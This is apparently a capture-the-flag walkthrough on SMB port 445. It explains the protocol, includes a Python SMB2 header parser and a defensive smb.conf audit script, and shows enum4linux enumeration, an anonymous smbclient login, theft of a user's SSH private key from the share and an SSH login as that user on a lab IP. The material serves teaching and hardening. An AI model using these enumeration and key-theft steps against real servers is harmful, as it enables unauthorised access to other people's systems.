SMB - Server Message Block, port 445
Server Message Block (SMB) is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network.
Servers make file systems and other resources (printers, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.
Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.
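On the wire over port 445 each of those commands is one SMB2 message: a 4-byte NetBIOS session header followed by a fixed 64-byte SMB2 header whose Command, Flags, SessionId and TreeId fields say what the client is doing and whether the message is signed. The parser below is an added example, not part of the original notes; the frames it parses are constructed inline (the NEGOTIATE / SESSION_SETUP / TREE_CONNECT sequence that precedes any share access) and the "unsigned messages inside an established session" heuristic is an assumption about what a guest or anonymous session looks like when signing is not enforced, since such sessions have no key to sign with.

```python
import struct
from dataclasses import dataclass
from typing import List

# SMB2 command codes (MS-SMB2 2.2.1). Share enumeration only touches the first few.
SMB2_COMMANDS = {
    0x0000: "NEGOTIATE", 0x0001: "SESSION_SETUP", 0x0002: "LOGOFF",
    0x0003: "TREE_CONNECT", 0x0004: "TREE_DISCONNECT", 0x0005: "CREATE",
    0x0006: "CLOSE", 0x0007: "FLUSH", 0x0008: "READ", 0x0009: "WRITE",
    0x000A: "LOCK", 0x000B: "IOCTL", 0x000C: "CANCEL", 0x000D: "ECHO",
    0x000E: "QUERY_DIRECTORY", 0x000F: "CHANGE_NOTIFY", 0x0010: "QUERY_INFO",
    0x0011: "SET_INFO", 0x0012: "OPLOCK_BREAK",
}
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001  # set on responses
SMB2_FLAGS_SIGNED = 0x00000008           # Signature field is valid

# Header fields between ProtocolId (4 bytes) and Signature (16 bytes), little-endian:
# StructureSize, CreditCharge, Status, Command, CreditRequest, Flags, NextCommand,
# MessageId, Reserved, TreeId, SessionId  -> 44 bytes, 64 in total.
_HDR_FMT = "<HHIHHIIQIIQ"


@dataclass
class Smb2Header:
    command: str
    is_response: bool
    signed: bool
    status: int
    message_id: int
    session_id: int
    tree_id: int


def build_smb2_frame(command, flags=0, message_id=0, session_id=0, tree_id=0,
                     status=0, payload=b""):
    """Build a direct-TCP SMB2 frame for test data (constructed, payload left opaque)."""
    fixed = struct.pack(_HDR_FMT, 64, 0, status, command, 1, flags, 0,
                        message_id, 0, tree_id, session_id)
    body = b"\xfeSMB" + fixed + b"\x00" * 16 + payload  # zero Signature = unsigned
    # NetBIOS session service header used on port 445: one zero byte + 3-byte length.
    return b"\x00" + len(body).to_bytes(3, "big") + body


def parse_smb2_frame(frame: bytes) -> Smb2Header:
    """Parse one frame as captured on TCP/445 and return the decoded SMB2 header."""
    if len(frame) < 68:
        raise ValueError("frame too short for NetBIOS header + SMB2 header")
    if frame[0] != 0:
        raise ValueError("not a NetBIOS session message")
    nb_len = int.from_bytes(frame[1:4], "big")
    body = frame[4:4 + nb_len]
    if len(body) != nb_len:
        raise ValueError("truncated frame")
    if body[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2/3 header (legacy SMB1 starts with \\xffSMB)")
    (struct_size, _credit_charge, status, command, _credits, flags, _next_cmd,
     msg_id, _reserved, tree_id, session_id) = struct.unpack_from(_HDR_FMT, body, 4)
    if struct_size != 64:
        raise ValueError(f"bad StructureSize {struct_size}")
    return Smb2Header(
        command=SMB2_COMMANDS.get(command, f"UNKNOWN_{command:#06x}"),
        is_response=bool(flags & SMB2_FLAGS_SERVER_TO_REDIR),
        signed=bool(flags & SMB2_FLAGS_SIGNED),
        status=status, message_id=msg_id, session_id=session_id, tree_id=tree_id,
    )


def unsigned_session_messages(frames) -> List[str]:
    """Commands exchanged inside an established session (SessionId != 0) without the
    SIGNED flag. Heuristic (assumption): this is what a guest/anonymous session looks
    like when the server does not require signing."""
    out = []
    for f in frames:
        h = parse_smb2_frame(f)
        if h.session_id and not h.signed:
            out.append(("rsp " if h.is_response else "req ") + h.command)
    return out


# Constructed capture: negotiate, session setup, then connect to a share.
SAMPLE_FRAMES = [
    build_smb2_frame(0x0000, message_id=0),                       # NEGOTIATE request
    build_smb2_frame(0x0001, message_id=1),                       # SESSION_SETUP request
    build_smb2_frame(0x0001, flags=SMB2_FLAGS_SERVER_TO_REDIR,    # SESSION_SETUP response,
                     message_id=1, session_id=0x1122),            # session now established
    build_smb2_frame(0x0003, message_id=2, session_id=0x1122),    # TREE_CONNECT request
    build_smb2_frame(0x0003, flags=SMB2_FLAGS_SERVER_TO_REDIR,    # TREE_CONNECT response
                     message_id=2, session_id=0x1122, tree_id=1),
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(parse_smb2_frame(f))
    print("unsigned in-session:", unsigned_session_messages(SAMPLE_FRAMES))
```

The same header layout applies to every SMB2/SMB3 dialect, so the parser works on frames from a pcap taken on a file server; the NetBIOS length prefix is what lets you walk several messages in one TCP segment.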
Enumerating SMB
Enum4Linux
$ enum4linux [options] ip
TAG   FUNCTION
-U    get userlist
-M    get machine list
-N    get namelist dump (different from -U and -M)
-S    get sharelist
-P    get password policy information
-G    get group and member list
-A    all of the above (full basic enumeration)
$ enum4linux -A 10.10.172.114
We pulled the name of the machine POLOSMB and an interesting share "profiles".
smbclient
$ smbclient //10.10.172.114/profiles -U anonymous -p 445
If our interesting share has been configured to allow anonymous access, i.e. it doesn't require authentication to view the files, we can connect to it easily by:
- using the username "Anonymous"
- connecting to the share we found during the enumeration stage
- and not supplying a password.
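From the defender's side, a share that accepts a made-up username and an empty password is the result of two Samba settings: `guest ok = yes` on the share and, globally, `map to guest = Bad User`, which turns any unknown username into the guest account. The audit script below is an added example, not part of the original notes or of Samba; both smb.conf fragments are constructed (the weak one mirrors the symptoms seen on the lab share, the hardened one is the corrected form) and the rule that an explicit `writeable` setting overrides `read only` is a simplification labelled in the code.

```python
# Minimal smb.conf reader plus an audit for anonymous-access misconfigurations.
# Constructed example config, not the lab box's real smb.conf.
WEAK_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Bad User        ; unknown usernames become the guest account
   server min protocol = NT1      ; SMB1 still accepted

[profiles]
   path = /home/profiles
   browseable = yes
   guest ok = yes                 ; anonymous clients may connect
   read only = no                 ; ... and write

[secure]
   path = /srv/secure
   valid users = @staff
   guest ok = no
   read only = yes
"""

# Same server after hardening (constructed).
HARDENED_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   map to guest = Never
   restrict anonymous = 2
   server min protocol = SMB3
   server signing = mandatory

[profiles]
   path = /home/profiles
   valid users = @staff
   guest ok = no
   read only = yes
"""

SMB1_DIALECTS = ("CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1")
SYNONYMS = {"public": "guest ok", "writable": "writeable"}  # Samba parameter aliases


def parse_smb_conf(text):
    """Return {section: {key: value}} with lower-cased keys, '#'/';' comments dropped."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
            continue
        if section is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key = " ".join(key.lower().split())          # collapse internal whitespace
        key = SYNONYMS.get(key, key)
        value = value.split(";")[0].split("#")[0]    # strip trailing comment
        conf[section][key] = value.strip()
    return conf


def _yes(value, default):
    if value is None:
        return default
    return value.lower() in ("yes", "true", "1")


def share_is_writable(share):
    # Simplification (assumption): an explicit 'writeable' wins over 'read only';
    # real Samba uses whichever appears last. 'read only' defaults to yes.
    if "writeable" in share:
        return _yes(share["writeable"], False)
    return not _yes(share.get("read only"), True)


def audit_smb_conf(text):
    """List anonymous-access weaknesses; an empty list means nothing was flagged."""
    conf = parse_smb_conf(text)
    g = conf.get("global", {})
    findings = []
    mtg = g.get("map to guest", "Never")
    if mtg.lower() != "never":
        findings.append(f"global: 'map to guest = {mtg}' turns failed logins into guest sessions")
    if g.get("server min protocol", "SMB2_02").upper() in SMB1_DIALECTS:
        findings.append("global: SMB1 still accepted via 'server min protocol'")
    if g.get("server signing", "default").lower() != "mandatory":
        findings.append("global: SMB signing is not mandatory")
    for name, share in conf.items():
        if name == "global":
            continue
        if _yes(share.get("guest ok"), False):
            mode = "read/write" if share_is_writable(share) else "read-only"
            path = share.get("path", "<no path>")
            findings.append(f"[{name}]: guest ok = yes exposes {path} to anonymous clients ({mode})")
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(label, audit_smb_conf(conf) or ["no findings"])
```

Run it against `/etc/samba/smb.conf` by reading the file into `audit_smb_conf`; on a real server `testparm -s` first normalises the file, which removes the synonym and ordering corner cases the small parser only approximates.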
Once connected, download the following:
$ get .profile
$ get "Working From Home Information.txt"
Found the user's name.
$ cd .ssh
$ get id_rsa
RSA private key.
After downloading, restrict the key's permissions (ssh refuses to use a private key that other users can read):
$ chmod 600 id_rsa
$ get id_rsa.pub
RSA public key; its comment field contains cactus@polosmb, which gives the username.
Use the following info to log in to the box:
the RSA key id_rsa, the username cactus and the IP address.
$ ssh -i ./id_rsa cactus@10.10.172.114
Pull the smb.txt file to grab the flag.